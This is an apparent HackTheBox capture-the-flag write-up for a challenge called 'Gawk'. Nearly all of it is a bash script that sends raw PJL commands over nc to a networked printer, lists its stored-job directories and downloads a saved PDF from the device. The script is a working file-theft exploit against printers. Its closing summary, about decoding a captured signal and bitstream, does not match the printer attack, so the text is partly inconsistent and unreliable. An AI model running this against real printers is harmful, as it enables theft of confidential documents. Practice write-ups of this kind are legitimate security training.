HackTheBox Gawk Challenge
https://app.hackthebox.com/challenges/246
Description
I lost access to my computer and need a document urgently which got stuck in a printer. Can you get me the document ?
Exploitation
#!/bin/bash
if [ "$#" -ne 2 ]; then
echo "Usage: $0 <ip> <port>"
exit 1
fi
IP=$1
PORT=$2
OUTPUT_FILE="HR_Policies.pdf"
echo "[*] Connecting to printer at $IP:$PORT..."
echo "[*] Listing root directory..."
echo -e "@PJL FSDIRLIST NAME=\"0:/\" ENTRY=1 COUNT=65535\r\n" | nc -q 2 $IP $PORT
echo "[*] Listing saveDevice directory..."
echo -e "@PJL FSDIRLIST NAME=\"0:/saveDevice\" ENTRY=1 COUNT=65535\r\n" | nc -q 2 $IP $PORT
echo "[*] Listing SavedJobs directory..."
echo -e "@PJL FSDIRLIST NAME=\"0:/saveDevice/SavedJobs\" ENTRY=1 COUNT=65535\r\n" | nc -q 2 $IP $PORT
echo "[*] Listing InProgress directory..."
echo -e "@PJL FSDIRLIST NAME=\"0:/saveDevice/SavedJobs/InProgress\" ENTRY=1 COUNT=65535\r\n" | nc -q 2 $IP $PORT
echo "[*] Downloading HR_Policies.pdf..."
echo -e "@PJL FSUPLOAD NAME=\"0:/saveDevice/SavedJobs/InProgress/HR_Policies.pdf\" OFFSET=0 SIZE=41893\r\n" | nc -q 2 $IP $PORT | tail -n +2 | base64 -d > $OUTPUT_FILE
if [ -f "$OUTPUT_FILE" ]; then
echo "[+] File successfully downloaded as $OUTPUT_FILE"
echo "[+] Use a PDF viewer to open the file and retrieve the flag."
else
echo "[-] Failed to download the file."
fi
xdg-open HR_Policies.pdf
Summary
Gawk: decode the captured signal, map the bitstream, and recover the flag.